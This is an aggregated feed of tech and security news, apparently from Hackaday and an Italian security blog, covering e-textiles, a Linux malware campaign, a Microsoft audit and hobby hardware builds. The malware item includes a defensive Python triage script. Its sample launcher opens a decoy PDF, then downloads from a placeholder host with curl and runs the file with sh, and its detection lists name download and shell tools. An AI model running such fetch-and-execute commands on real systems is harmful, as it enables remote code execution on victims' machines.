Fiber Computers Are Coming! E-Textiles Arrive, the Smart Fabric Revolution
Scientists have assembled the key elements of a computing system into a single flexible thread that is even machine-washable. The idea is to weave many of these threads into fabric to create "fiber computers": garments with built-in intelligence and sensors.
This is the next step for smart textiles, or e-textiles: materials with electronic components that extend the capabilities of wearable devices and make it possible to build, for example, interactive fabrics and displays. The first examples were LilyPad in 2007: sewable modules for garments, toys and interactive art objects. But most solutions have long shared a common problem: the threads themselves could do almost nothing and contained no individual components, which made it hard to read biological signals and process data in real time.
In their new work, the researchers packed sensing, communication, processing and memory into a single elastic thread. Each thread stretches by 60% and is machine-washable, making it suitable for everyday use. Each fiber contains eight devices: four sensors (a photodiode, a temperature sensor, an accelerometer and a PPG sensor that measures changes in the skin's light absorption and is suited to heart-rate monitoring), plus a microcontroller, two communication modules and a power-management unit. Together these allow data to be collected, processed and stored, and the results to be transmitted.
To test the system in practice, four "smart threads" were sewn into a sleeve and a trouser leg, and a volunteer was asked to perform a series of bodyweight exercises: squats, lunges, planks and arm rotations. Each thread ran its own trained neural network, recognizing the movements in real time. A single fiber correctly identified the type of action in 67% of cases, and with four threads working together the accuracy rose to 95%.
The authors stress that this advance demonstrates the power of cooperative "multi-node" sensing and distributed processing: local computation on each fiber is complemented by a network-level decision, and the system becomes more reliable and accurate.
The researchers acknowledge that challenges remain before large-scale deployment: speeding up data exchange between threads, reducing power consumption and expanding the available bandwidth. They see the next steps in developing faster, low-latency communication protocols designed specifically for "fiber computers". If that succeeds, clothing will truly be able not only to "feel" a person but also to understand their movements in real time, without compromising convenience or normal garment care.
The article Fiber Computers Are Coming! E-Textiles Arrive, the Smart Fabric Revolution is from il blog della sicurezza informatica.
Microsoft Denies the August Update Damaged SSDs: Users Say Otherwise
Microsoft has denied that the August Windows 11 security update is linked to mass complaints of storage device failures. The investigation was opened after reports from users who, after installing the KB5063878 patch, said their SSDs and HDDs had begun to fail or corrupt data.
The company acknowledged that it is aware of such incidents and has gathered information from affected customers. However, internal testing and telemetry data did not confirm any increase in failures or file corruption. Joint checks with storage device manufacturers also found no connection between the update and the problems.
The first to report the malfunctions were Japanese users.
The problem occurred during intensive write operations, such as copying large volumes or many files onto drives more than 60% full. Some devices recovered after a reboot, but others remained completely inaccessible.
Similar complaints came from owners of Corsair Force MP600, SanDisk Extreme Pro, Maxio SSD, Kioxia Exceria Plus G4 and Kioxia M.2 drives, as well as drives built on InnoGrit and Phison controllers. Phison even stated that it is working with Microsoft and other partners to find the cause of the incident. The company stressed that it understands the scale of the disruption and is checking the affected controllers.
Until the details are clarified, Windows 11 users are advised to avoid heavy write operations, that is, not to copy tens of gigabytes of data onto storage devices that are more than 60% full.
Microsoft, for its part, promises to keep monitoring feedback after every update and to investigate all new incidents.
Watch Bondo Putty Get Sprayed Onto 3D Prints
3D prints destined for presentation need smooth surfaces, and that usually means sanding. [Uncle Jessy] came across an idea he decided to try out for himself: spraying Bondo spot putty onto a 3D print. Bondo spot putty comes from a tube, cures quickly, and sands smoothly. It’s commonly used to hide defects and give 3D prints a great finish. Could spraying liquified Bondo putty onto a 3D print save time, or act as a cheat code for hiding layer lines? [Uncle Jessy] decided to find out. Gaps and larger flaws still need to be filled by hand, but spray application seems to be a big time saver if nothing else.
The first step is to turn the distinctive red putty into something that can be sprayed through a cheap, ten dollar airbrush. That part was as easy as squeezing putty into a cup and mixing in acetone in that-looks-about-right proportions. A little test spray showed everything working as expected, so [Uncle Jessy] used an Iron Man mask (smooth surfaces on the outside, textured inside) for a trial run.
Spraying the liquified Bondo putty looks about as easy as spraying paint. The distinctive red makes it easy to see coverage, and it cures very rapidly. It’s super easy to quickly give an object an even coating — even in textured and uneven spots — which is an advantage all on its own. To get a truly smooth surface one still needs to do some sanding, but the application itself looks super easy.
Is it worth doing? [Uncle Jessy] says it depends. First of all, aerosolizing Bondo requires attention to be paid to safety. There’s also a fair bit of setup involved (and a bit of mess) so it might not be worth the hassle for small pieces, but for larger objects it seems like a huge time saver. It certainly seems to cover layer lines nicely, but one is still left with a Bondo-coated object in the end that might require additional sanding, so it’s not necessarily a cheat code for a finished product.
If you think the procedure might be useful, check out the video (embedded below) for a walkthrough. Just remember to do it in a well-ventilated area and wear appropriate PPE.
An alternative to applying Bondo is brush application of UV resin, but we’ve also seen interesting results from non-planar ironing.
Sindoor Dropper: the Malware That Uses the India-Pakistan Clash to Infect Linux
An insidious malware campaign known as "Sindoor Dropper" targets Linux operating systems, using refined spear-phishing methods and a complex, multi-stage infection process. The covert operation targets users with lures tied to the recent clash between Pakistan and India, known as Operation Sindoor, to persuade them to open malicious files.
The Sindoor Dropper campaign highlights an evolution in threat actors' attack techniques, showing a clear focus on Linux environments, which are less often targeted by phishing campaigns.
The attack begins when a user opens a malicious .desktop file, named "Note_Warfare_Ops_Sindoor.pdf.desktop", which poses as an ordinary PDF document. According to Nextron's analysis, once executed it opens a benign decoy PDF to maintain the illusion of legitimacy while silently launching a complex, heavily obfuscated infection process in the background.
The .desktop file, Nextron reports, downloads several components, including an AES decryptor (mayuw) and an encrypted downloader (shjdfhd). A distinctive trait of this activity is the use of desktop files turned into offensive tools, a technique previously attributed to the APT36 group, also known as Transparent Tribe or Mythic Leopard, which specializes in advanced persistent threats.
The process was designed to evade both static and dynamic analysis. At the time of its discovery, the initial payload had left no trace on VirusTotal and so went undetected. The decryptor, a UPX-packed Go binary, is deliberately corrupted by removing its ELF magic bytes, probably to bypass security scanning on platforms such as Google Docs. The .desktop file restores these bytes on the victim's machine to make the binary executable again.
This starts a multi-stage process in which each component decrypts and runs the next. The chain includes basic anti-virtual-machine checks, such as verifying adapter and vendor names, blacklisting specific MAC address prefixes and checking the machine's uptime.
The final payload is a repurposed version of MeshAgent, a legitimate open-source remote administration tool. Once deployed, MeshAgent connects to a command-and-control (C2) server hosted on an Amazon Web Services (AWS) EC2 instance at wss://boss-servers.gov.in.indianbosssystems.ddns[.]net:443/agent.ashx.
This gives the attacker full remote access to the compromised system, allowing them to monitor user activity, move laterally across the network and exfiltrate sensitive data, Nextron said.
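Two of the traits described above (a document-named .desktop launcher that opens a decoy and fetches more stages, and an ELF with its magic bytes blanked) lend themselves to simple host triage. The example below is added here for illustration and is not Nextron's tooling or a sample from the campaign: the two launchers and the byte strings are constructed, the URL is a placeholder, and the headerless-ELF check assumes the four magic bytes were overwritten in place rather than cut off.

```python
import re
import shlex

# Constructed sample launchers (not artifacts from the campaign; the URL is a placeholder).
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Firefox
Exec=firefox %u
Icon=firefox
"""

SUSPICIOUS_DESKTOP = """[Desktop Entry]
Type=Application
Name=Quarterly_Report.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "xdg-open /tmp/decoy.pdf; curl -s http://PLACEHOLDER.invalid/x -o /tmp/x; sh /tmp/x"
"""

DOC_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".txt")
SHELLS = {"sh", "bash", "dash", "zsh"}
DOWNLOADERS = {"curl", "wget"}
ELF_MAGIC = b"\x7fELF"


def parse_desktop_entry(text):
    """Minimal parser: key/value pairs of the [Desktop Entry] group only."""
    entry, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip()
    return entry


def triage_desktop_file(filename, text):
    """Return finding codes for a launcher; an empty list means nothing odd was seen."""
    entry = parse_desktop_entry(text)
    exec_line = entry.get("Exec", "")
    try:
        tokens = shlex.split(exec_line)
    except ValueError:
        tokens = exec_line.split()
    findings = []
    lower = filename.lower()
    stem = lower[:-len(".desktop")] if lower.endswith(".desktop") else ""
    if stem.endswith(DOC_EXTS):
        findings.append("double_extension_filename")
    if entry.get("Type") == "Application" and entry.get("Name", "").lower().endswith(DOC_EXTS):
        findings.append("document_name_on_application")
    if tokens and tokens[0].rsplit("/", 1)[-1] in SHELLS and "-c" in tokens[1:3]:
        findings.append("shell_wrapper")
    flat = " ".join(tokens)  # includes the body of any -c "..." argument
    commands = {w.rsplit("/", 1)[-1] for w in re.findall(r"[A-Za-z0-9_./-]+", flat)}
    if commands & DOWNLOADERS:
        findings.append("network_download")
    if "xdg-open" in commands and re.search(r"[;&|]", flat):
        findings.append("decoy_document_then_more_commands")
    return findings


def elf_header_state(data):
    """Classify a blob as 'elf', 'headerless_elf' (magic blanked but e_ident plausible) or 'other'.

    Assumes an in-place overwrite of bytes 0-3: EI_CLASS (byte 4) and EI_DATA (byte 5) must be
    1 or 2, EI_VERSION (byte 6) must be 1, and EI_PAD (bytes 9-15) must be zero.
    """
    if len(data) < 16:
        return "other"
    if data[:4] == ELF_MAGIC:
        return "elf"
    plausible_ident = data[4] in (1, 2) and data[5] in (1, 2) and data[6] == 1
    if plausible_ident and data[7] < 20 and data[9:16] == b"\x00" * 7:
        return "headerless_elf"
    return "other"
```

Run `triage_desktop_file` over launchers found in user-writable locations and `elf_header_state` over fresh downloads; a non-empty finding list or a "headerless_elf" result is a prompt for manual review, not a verdict.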
This Soviet-Style Clock Uses Homemade Nixie Tubes and Glowing Logic
The neon glow of a Nixie tube makes for an attractive clock, but that’s not enough neon for some people. [Changliang Li] is apparently one of those people, because he’s using Soviet-era cold-cathode tubes as the logic for his “Soviet-Era Style Clock”.
Aside from the Nixies used for display, the key components you see working in this beautiful machine are the MTX-90 cold-cathode thyratrons, which look rather like neon tubes in action. That’s because they essentially are, just with an extra trigger electrode (which this circuit doesn’t use). The neon tubes are combined into a loop counter, which divides the 50 Hz mains frequency down into seconds, minutes, and hours. The circuit is not original to this project, and indeed was once common in electronics books. The version used in this project is credited to [PA3FWM].
The Nixie tubes are new-made by [Sadudu] of iNixie labs, and we get a fascinating look in how they are made. (Tubemaking starts at around 1:37 in the video below.) It looks like a fiber laser is used to cut out glow elements for the tube, which is then encapsulated on a device which appears to be based around a lathe.
The cold-cathode tubes used as logic rely on ambient light or background radiation to start reliably, since the trigger electrode is left floating. In order to ensure reliable switching from the thyratrons, [Changliang Li] includes a surplus smoke detector source to ensure sufficient ionization. (The video seems to imply the MTX-90 was seeded with radioisotopes that have since decayed, but we could find no evidence for this claim. Comment if you know more.)
The end result is attractive and rather hypnotic. (Jump to 3:37 to see the clock in action.) If you want to know more about this sort of use for neon lamps (and the Soviet MTX-90) we featured a deeper dive a while back.
Thanks to [Changliang Li] for the incandescent tip. If one of your bright ideas has had a glow up into a project, don’t hesitate to share it on our tips line.
The Latest Projects from Cornell’s ECE 4760/5730
ECE 4760/5730 is the Digital Systems Design Using Microcontrollers course at Cornell University taught by [Hunter Adams]. The list of projects for spring this year includes forty write-ups — if you haven’t got time to read the whole lot you can pick a random project between 1 and 40 with: shuf -i 1-40 -n 1 and let the cards fall where they may. Or if you’re made of time you could spend a few days watching the full playlist of 119 projects, embedded below.
We won’t pick favorites from this semester’s list of projects, but having skimmed through the forty reports we can tell you that the creativity and acumen of the students really shines through. If the name [Hunter Adams] looks familiar that might be because we’ve featured his work here on Hackaday before. Earlier this year we saw his Love Letter To Embedded Systems.
While on the subject, [Hunter] also wanted us to know that he has updated his lectures, which are here: Raspberry Pi Pico Lectures 2025. In particular, these have been expanded to include a bunch of Pico W content (making Bluetooth servers, connecting to WiFi, UDP communication, etc.), some fun lower-level stuff (the RP2040 boot sequence, how to write a bootloader), and some interesting algorithms (FFTs, physics modeling, etc.).
Does it Make Sense to Upgrade a Prusa Mark 4S to a Core One?
Some of these Mark 4S parts will become a Prusa Core One. (Credit: Aurora Tech, YouTube)
One of the interesting things about Prusa’s FDM 3D printers is the availability of official upgrade kits, which allow you to combine bits off an older machine with those of the target machine to ideally save some money and not have an old machine gathering dust after the upgrade. While for a bedslinger-to-bedslinger upgrade this can make a lot of sense, the bedslinger to CoreXY Core One upgrade path is a bit more drastic. Recently the [Aurora Tech] channel had a look at which upgrade path makes the most sense, and in which scenario.
A big part of the comparison is the time and money spent compared to the print result, as you have effectively four options. Either you stick with the Mark 4S, get the DIY Core One (~8 hours of assembly time), get the preassembled Core One (more $$), or get the upgrade kit (also ~8 hours). There’s also the fifth option of getting the enclosure for the Mark 4S, but it costs about as much as the upgrade kit, so that doesn’t make a lot of logical sense.
In terms of print quality, it’s undeniable that the CoreXY motion system provides better results, with less ringing and better quality with tall prints, but unless you’re printing more than basic PLA and PETG, or care a lot about the faster print speeds of the CoreXY machine with large prints, the fully enclosed Core One is a bit overkill and sticking with the bedslinger may be the better choice. The long and short of it is that you have to look at each option and consider what works best for your needs and your wallet.
Silent No More: Open-Source Fix for Mic Mishaps
“Sorry, my mic was muted…” With the rise of video calls, we’ve all found ourselves rushing to mute or unmute our mics in the midst of a call. This open-source Mute Button, sent in by [blackdevice], aims to take out the uncertainty and make toggling your mic easy.
It’s centered around a small PIC32MM microcontroller that handles the USB communications, controls the three built-in RGB LEDs, and reads the inputs from the encoder mounted to the center of this small device. The button-and-knob combo is small enough to easily move around your desk, yet large enough to toggle without fuss when it’s your turn to talk.
To utilize all the functions of the button, you’ll need to install the Python-based driver on your machine. Doing so will let you not only toggle your microphone and volume, but it will also allow the button to light up to get your attention should you be trying to talk with the mic muted.
Although small, it’s also quite rugged, knowing it will spend its life being treated much like a game of Whac-A-Mole—slapped whenever needed. The case is designed to be 3D printed by any FDM printer, with the top knob section printed in translucent material to make the notification light clearly visible.
All of the design files, firmware, and parts list are available over on [blackdevices]’s GitHub page, and they are open-source, allowing you to tweak the design to fit your unique needs. Thank you for sending in this well-documented project, [blackdevices]; we look forward to seeing future work. If you like this type of thing, be sure to check out some of our other cool featured desk gadgets.
Building a Shifting Ratchet Wrench
Convenient though they may be, [Trevor Faber] found some serious shortcomings in shifting spanners: their worm gears are slow to adjust and prone to jamming, they don’t apply even force to all faces of a bolt head, and without a ratchet, they’re rather slow. To overcome these limitations, he designed his own adjustable ratchet wrench.
The adjustment mechanism is based on a pair of plates with opposing slots; the wrench faces are mounted on pins which fit into these slots, and as one plate rotates relative to the other, the faces slide inwards or outwards. A significant advantage of this design is that, since one plate is attached to the wrench’s handle, some of the torque applied to the wrench tightens its grip on the bolt. To let the wrench loosen as well as tighten bolts, [Trevor] simply mirrored the mechanism on the other side of the wrench. Manufacturing proved to be quite a challenge: laser cutting wasn’t precise enough for critical parts, and CNC control interpolation resulted in some rough curves which caused the mechanism to bind, but after numerous iterations, [Trevor] finally got a working tool.
To use the wrench, you twist an outer ring to open the jaws, place them over the bolt, then let them snap shut. One nice touch is that you can close this wrench over a bolt, let go of it, and do something else without the wrench falling off the bolt. Recessed bolts were a bit of an issue, but a chamfer ought to improve this. It probably won’t be replacing your socket set, but it looks like it could make the odd job more enjoyable.
If you prefer a more conventional shifting wrench, you can make a miniature out of an M20 nut. It’s also possible to make a shifting Allen wrench.
Thanks to [Adam Foley] for the tip!
The Pentagon Opens an Audit of Microsoft. Chinese Engineers and Alleged Backdoors Under Investigation
The Pentagon has sent Microsoft a "letter of concern" documenting a "breach of trust" over the company's use of Chinese engineers to maintain sensitive government computer systems, Secretary of Defense Pete Hegseth announced this week.
At the same time, the Department of Defense is opening an investigation to determine whether any of these employees compromised national security.
"The use of Chinese nationals to maintain Department of Defense cloud environments is over," Hegseth said in a video statement. "We have sent a formal letter of concern to Microsoft documenting this breach of trust, and we are requesting a third-party audit of Microsoft's digital escort program, including the code and the requests of the Chinese nationals."
"Did they put something in the code that we were not aware of? We will find out," Hegseth added.
The actions were taken in response to a recent investigation that exposed Microsoft's "digital escort" system, in which US personnel with security clearances supervise foreign engineers, including those in China. ProPublica found that the escorts often lack the skills needed to effectively supervise engineers with far more advanced technical expertise.
The technology giant developed this arrangement to get around the Department of Defense requirement that people handling sensitive data must be US citizens or permanent residents.
"The program was designed to comply with procurement rules, but it exposed the department to unacceptable risks," Hegseth said in a video announcement posted on X.
The letter serves as a warning to Microsoft, which has stated in its financial reports that it receives "substantial revenue from government contracts". It is less severe than a "cure notice", which could lead to the termination of Microsoft's contracts if the problems are not resolved.
The department has not made the letter public and did not respond to ProPublica's request for a copy.
Open Source Interactive Wallpapers for Windows
It’s late at night, and you’re avoiding work that was supposed to be done yesterday. You could open an application on your desktop to keep your attention, or what about the desktop itself? [Underpig1] has you covered with Octos. Octos is an open-source application created to allow interactive wallpapers based on HTML, CSS, or JS for Windows 10 and 11.
There are many wallpaper applications made to spruce up your desktop, but Octos stands out to us here at Hackaday from the nature of being open source. What comes along with the project is a detailed API to reference when creating your own wallpaper. Additionally, this allows for detailed and efficient visualization techniques that would otherwise be difficult to display, perfect for procrastination.
Included demos range from an interactive solar system to Conway’s Game of Life. Customization options allow for basic manipulation of the backdrops in the application itself, but we’re sure you could allow for some fun options with enough tinkering.
If you want to try Octos out for yourself, it’s incredibly easy. Octos can be found on the Microsoft Store, and additional backdrops can be added within the application. Open-source applications allow for incredibly easy additions to your personal device, but it’s not always that way. Kindle has been a prime example of a fairly locked down system; however, that never stops a clever hacker!
Thanks to [Joshua Throm] for the tip!
FPGA Brings UNIX v1 to the DEC J-11
If you’ve never used a PDP-11 before it’s probably because you simply weren’t around in the 70s and 80s. Although they started as expensive machines only in research labs and industry, they eventually became much more accessible. They’re a bit of a landmark in computing history, too, being largely responsible for the development of things like UNIX and the C programming language. [ryomuk] is using an FPGA in combination with an original DEC J-11 to bring us a new take on this machine. (Google Translate from Japanese)
The FPGA used in this build is a Tang Nano 20k, notable for its relatively low cost. The FPGA emulates the memory system and UART of a PDP-11 system down to the instruction set, while the original, unmodified DEC chip is left to its own devices. After some initial testing [ryomuk] built a PC11 paper tape emulator to ensure the system was working which runs a version of BASIC from the era. The next thing up was to emulate some disk drives and co-processors so that the machine can run the first version of UNIX.
[ryomuk] also developed a PCB for the DEC microprocessor and the FPGA to sit on together, and it includes all of the jumpers and wiring needed to allow the computer to run UNIX, as well as handling other miscellaneous tasks like power. It’s an interesting build that gets to the heart of the early days of computer science. PDP-11 computers did eventually get smaller and more accessible, and if you want to build a modern version this build fits a complete system into an ATX case.
Thanks to [RetepV] for the tip!
Google Warns 2.5 Billion Gmail Users: Account Security at Risk. Reset Your Password!
A wide-reaching security alert has been issued by Google to the 2.5 billion users of its Gmail service, aiming to strengthen the protection of their accounts following a data breach that affected one of the third-party Salesforce-based systems operated by the company.
In June 2025 an incident occurred that heightened concerns about sophisticated phishing operations aimed at a vast user base. This is in fact one of the largest mass security alerts Google has sent, not least because, although many users use strong passwords, only about a third update them regularly, leaving countless accounts exposed, especially those that do not use MFA.
In June, a cybercriminal group identified as UNC6040, also known by its extortion brand ShinyHunters, managed to infiltrate a corporate Salesforce instance used by Google. This system stored contact information and sales notes for small and medium-sized businesses.
The attackers used a social engineering tactic known as voice phishing, or "vishing", to gain initial access. Impersonating IT support staff over the phone, they tricked an employee into granting them system privileges. Google's analysis found that the threat actor managed to access and retrieve a limited amount of data consisting of basic, largely public business information, such as company names and contact details.
Although the stolen data is considered low-risk by nature, security specialists warn that it could be used to carry out highly convincing phishing and vishing attacks. Google stressed that the breach did not compromise consumer products such as Gmail or Google Drive and that no passwords or financial data were exposed.
Victims are deceived by attackers who use news of a breach to craft scams that appear legitimate, pushing users to hand over their login credentials or two-factor authentication codes. The criminal group's tactics become more aggressive when they leak the data or use it to extort money, increasing the pressure on victims. This allowed the hackers to exfiltrate the data before their access was discovered and blocked by Google's security teams. ShinyHunters is a well-known group linked to recent data breaches at other major companies, including Adidas, Cisco and LVMH.
On 8 August Google announced that it had finished emailing all parties affected by the breach, after disclosing the details of the incident and of UNC6040's activity on 5 August. Given the considerable risk of further attacks, it is essential that all Gmail users remain alert and apply preventive measures.
Users are strongly advised to renew their login credentials, enable two-step verification and not trust unsolicited emails or phone calls requesting sensitive data.
Moscow Hires the Criminal Hackers Who Hit the Electronic School in 2022 to Improve It
The participants in the cyberattack on the Moscow Electronic School have been offered jobs improving the cybersecurity and other digital services of the capital's administration. This follows the events of 17 September 2022, when for three days students and teachers could not upload homework, assign grades or use the services because of a hacker attack.
Talent recruitment
The Moscow authorities hired the criminal hackers after their cyberattack on the IT platform of the Moscow Electronic School (MES), RBC writes. According to Moscow deputy mayor Anastasia Rakova, the participants in the cyberattack on the MES received an offer to work on improving the cyber defenses and other digital services of the capital's administration in 2025. According to her, the city authorities are ready to hire IT talent.
"Four young people who in previous years had come close to successfully hacking the IT platform now work on the MES team," the official told TASS. The Moscow Electronic School (MES) was launched by the city authorities in 2016 and is a single digital education platform for students, teachers and parents. The MES's main services include a library of teaching materials, an electronic diary and a Student Portfolio.
Today the MES library contains more than 1.6 million teaching materials, from tests and lesson plans to virtual labs and exam-preparation materials. Both specialized national developers and ordinary teachers can add materials.
Hackers in the electronic school
Kommersant, close to the Moscow Department of Education and Science, confirmed that at the time the problem affected almost every school: "Uploading homework and grades did not work, nor did the mobile version of the services." By the evening of 20 September most of the problems had been resolved.
The MES had already had serious problems before 2022. In 2017, the Moscow City Department of Information Technology (DIT) moved the MES to new software.
In autumn 2020, on the first day of remote learning in Moscow schools during the Covid-19 pandemic, teachers had to hold lessons on Zoom because of the heavy load on the IT infrastructure. According to cybersecurity experts, the failure would not have come as a surprise to the mayor's office if additional cybersecurity measures had been taken in advance and vulnerability testing had been carried out.
L'articolo Mosca assume i Criminal Hacker che avevano colpito la Scuola Elettronica nel 2022 per migliorarla proviene da il blog della sicurezza informatica.
Measuring Nanoparticles by Scattering a Laser
A fundamental difficulty of working with nanoparticles is that your objects of study are too small for an optical microscope to resolve, and thus measuring their size can be quite a challenge. Of course, if you have a scanning electron microscope, measuring particle size is straightforward. But for less well-equipped labs, a dynamic light scattering system, such as [Etienne]’s OpenDLS, fits the bill.
Dynamic light scattering works by shining a laser beam into a suspension of fine particles, then using a light sensor to measure the intensity of light scattered onto a certain point. As the particles undergo Brownian motion, the intensity of the scattered light changes. Based on the speed with which the scattered light varies, it’s possible to calculate the speed of the moving particles, and thus their size.
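To make that inference concrete, here is an added example that is not part of the OpenDLS project or [Etienne]'s code: it simulates a detector trace with a known correlation decay, fits the decay rate of the autocorrelation, and inverts Stokes-Einstein for the hydrodynamic radius. The laser wavelength, scattering angle, water viscosity and refractive index are assumed values typical of a benchtop setup, and the AR(1) sequence is a constructed stand-in for a photodiode trace.

```python
import math
import random

# Assumed measurement conditions for this example (typical benchtop DLS):
# red laser diode, aqueous suspension at room temperature, detector at 90 degrees.
K_B = 1.380649e-23           # Boltzmann constant, J/K
T_KELVIN = 298.15            # temperature, K
ETA = 0.89e-3                # viscosity of water, Pa*s
N_MEDIUM = 1.33              # refractive index of water
WAVELENGTH = 650e-9          # laser wavelength in vacuum, m
THETA = math.radians(90.0)   # scattering angle

def scattering_vector():
    """q = 4*pi*n/lambda * sin(theta/2): the wavevector the correlation decay depends on."""
    return 4.0 * math.pi * N_MEDIUM / WAVELENGTH * math.sin(THETA / 2.0)

def decay_rate_for_radius(radius_m):
    """Field correlation g1(tau) = exp(-Gamma*tau) with Gamma = D*q^2 and the
    Stokes-Einstein diffusion coefficient D = kT / (6*pi*eta*R)."""
    diffusion = K_B * T_KELVIN / (6.0 * math.pi * ETA * radius_m)
    return diffusion * scattering_vector() ** 2

def simulate_signal(radius_m, n_samples, dt, seed=1):
    """Constructed detector trace: an AR(1) sequence whose autocorrelation is
    exp(-Gamma*k*dt). It decays at the field rate Gamma; a real intensity trace
    decays at 2*Gamma (Siegert relation), so a real pipeline halves the fitted rate."""
    phi = math.exp(-decay_rate_for_radius(radius_m) * dt)
    rng = random.Random(seed)
    x, out = 0.0, []
    for _ in range(n_samples):
        x = phi * x + rng.gauss(0.0, 1.0)
        out.append(x)
    return out

def autocorrelation(samples, max_lag):
    """Normalised autocorrelation g(k) for k = 1..max_lag."""
    n = len(samples)
    mean = sum(samples) / n
    c = [s - mean for s in samples]
    var = sum(v * v for v in c) / n
    return [sum(c[i] * c[i + k] for i in range(n - k)) / ((n - k) * var)
            for k in range(1, max_lag + 1)]

def hydrodynamic_radius(samples, dt, max_lag=12):
    """Fit ln g(k) = -Gamma * (k*dt) by least squares through the origin (g(0) = 1),
    then invert Stokes-Einstein to recover the particle radius in metres."""
    g = autocorrelation(samples, max_lag)
    pts = [(k * dt, math.log(gk)) for k, gk in enumerate(g, start=1) if gk > 0]
    gamma = -sum(t * y for t, y in pts) / sum(t * t for t, _ in pts)
    diffusion = gamma / scattering_vector() ** 2
    return K_B * T_KELVIN / (6.0 * math.pi * ETA * diffusion)

if __name__ == "__main__":
    DT = 1e-4                                   # 10 kHz sampling for the demo
    trace = simulate_signal(94e-9, 40_000, DT)  # 188 nm diameter spheres
    print(f"recovered diameter: {2e9 * hydrodynamic_radius(trace, DT):.0f} nm")
```

The fit only uses lags up to about one correlation time; the tail of the correlation function is where the estimate is noisiest, and multiple scattering in a concentrated sample adds a faster component there, which is one way an instrument ends up reading low.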
The OpenDLS uses a 3D printed and laser-cut frame to hold a small laser diode, which shines into a cuvette, on the side of which is the light sensor. [Etienne] tried a few different options, including a photoresistor and a light sensor designed for Arduino, but eventually chose a photodiode with a two-stage transimpedance amplifier. An Arduino samples the data at 67 kHz, then sends it over serial to a host computer, which uses SciPy and NumPy to analyse the data. Unfortunately, we were about six years late in getting to this story, and the Python program is a bit out of date by now (it was written in Python 2). It shouldn’t, however, be too hard for a motivated hacker to update.
With a standard 188 nm polystyrene dispersion, the OpenDLS calculated a size of 167 nm. Such underestimation seemed to be a persistent issue, probably caused by light being scattered multiple times. More dilution of the suspension would help, but it would also make the signal harder to measure, and the system’s already running near the limits of the hardware.
This isn’t the only creative way to measure the size of small particles, nor even the only way to investigate small particles optically. Of course, if you do have an electron microscope, nanoparticles make a good test target.
NFC Hidden In Floppy Disk For Retro-Themed PC
As we all look across a sea of lifeless, nearly identically-styled consumer goods, a few of us have become nostalgic for a time when products like stereo equipment, phones, appliances, homes, cars, and furniture didn’t all look indistinguishable. Computers suffered a similar fate, with nearly everything designed to be flat and minimalist with very little character. To be sure there are plenty of retro computing projects to recapture nostalgia, but to get useful, modern hardware in a fun, retro-themed case check out this desktop build from [Mar] that hides a few unique extras.
The PC itself is a modern build with an up-to-date operating system, but hidden in a 386-era case with early-90s styling. The real gem of this build though is the floppy disk drive, which looks unaltered on the surface. But its core functionality has been removed and in its place an Arduino sits, looking for NFC devices. The floppy disks similarly had NFC tags installed so that when they interact with the Arduino, it can send a command to the computer to launch a corresponding game. To the user it looks as though the game loads from a floppy disk, much like it would have in the 90s albeit with much more speed and much less noise.
Modern industrial design is something that we’ve generally bemoaned as of late, and it’s great to see some of us rebelling by building unique machines like this, not to mention repurposing hardware like floppy drives for fun new uses (which [Mar] has also open-sourced on a GitHub page). It’s not the first build to toss modern hardware in a cool PC case from days of yore, either. This Hot Wheels desktop is one of our favorites.
Feathers are Fantastic, but Flummoxing for Engineers
Birds are pretty amazing creatures, and one of the most amazing things about them and their non-avian predecessors are feathers. Engineers and scientists are finding inspiration from them in surprising ways.
The light weight and high strength of feathers has inspired those who look to soar the skies, dating back at least as far as Ancient Greece, but the multifunctional nature of these marvels has led to advancements in photonics, thermal regulation, and acoustics. The water repellency of feathers has also led to interesting new applications in both food safety and water desalination beyond the obvious water repellent clothing.
Sebastian Hendrickx-Rodriguez, the lead researcher on a new paper about the structure of bird feathers states, “Our first instinct as engineers is often to change the material chemistry,” but feathers are made in thousands of varieties to achieve different advantageous outcomes from a single material, keratin. Being biological in nature also means feathers have a degree of self repair that human-made materials can only dream of. For now, some researchers are building biohybrid devices with real bird feathers, but as we continue our march toward manufacturing at smaller and smaller scales, perhaps our robots will sprout wings of their own. Evolution has a several billion year head start, so we may need to be a little patient with researchers.
Some birds really don’t appreciate Big Brother any more than we do. If you’re looking for some feathery inspiration for your next flying machine, how about covert feathers. And we’d be remiss not to look back at the Take Flight With Feather Contest that focused on the Adafruit board with the same name.
The Confusing World of Wood Preservation Treatments
Wood is an amazing material to use around the house, both for its green credentials and the way it looks and feels. That said, as a natural product there are a lot of microorganisms and insects around that would love to take a few good nibbles out of said wood, no matter whether it’s used for fencing, garden furniture or something else. For fencing in particular wood treatments are therefore applied that seek to deter or actively inhibit these organisms, but as the UK bloke over at the [Rag ‘n’ Bone Brown] YouTube channel found out last year, merely slapping on a coating of wood preserver may actually make things worse.
For the experiment three tests were set up, each with an untreated, self-treated and two pressure treated (tanalized) sections. Of the pressure treated wood one had a fresh cut on the exposed side, with each of the three tests focusing on a different scenario.
After three years of these wood cuts having been exposed to being either partially buried in soil, laid on the long side or tossed in a bucket, all while soaking up the splendid wonders of British weather, the results were rather surprising and somewhat confusing. The self-treated wood actually fared worse than the untreated wood, while the pressure treated wood did much better, but as a comment by [davidwx9285] on the video notes, there are many questions regarding how well the pressure treatment is performed.
While the self-treatment gets you generally only a surface coating of the – usually copper-based – compound, the vacuum pressure treatment’s effectiveness depends on how deep the preservative has penetrated, which renders some treated wood unsuitable for being buried in the ground. Along with these factors the video correctly identifies the issue of grain density, which is why hardwoods resist decay much better than e.g. pine. Ultimately it’s quite clear that ‘simply put on a wood preserver’ isn’t quite the magical bullet that it may have seemed to some.
The (RF) Sniff Test
Sometimes the old tricks are the best. [Kevin] learned an old trick about using a ‘scope to sniff RF noise and pays it forward by sharing it in a recent video. He uses an oscilloscope. But does he need some special probe setup? Nope. He quickly makes a little RF pickup probe, and if you have a ‘scope, we’re pretty sure you can make one in a few seconds, too.
Of course, you can get probes made for that, and there are advantages to using them. But the trick of quickly and non-destructively modifying the existing probe to pick up RF means you always have a way to make these measurements.
The first thing he probes is a small power supply that is broadcasting inadvertently at 60 kHz. The power supply was charging a bug zapper and, as you might expect, the bug zapper throws out a lot of noise on the radio bands.
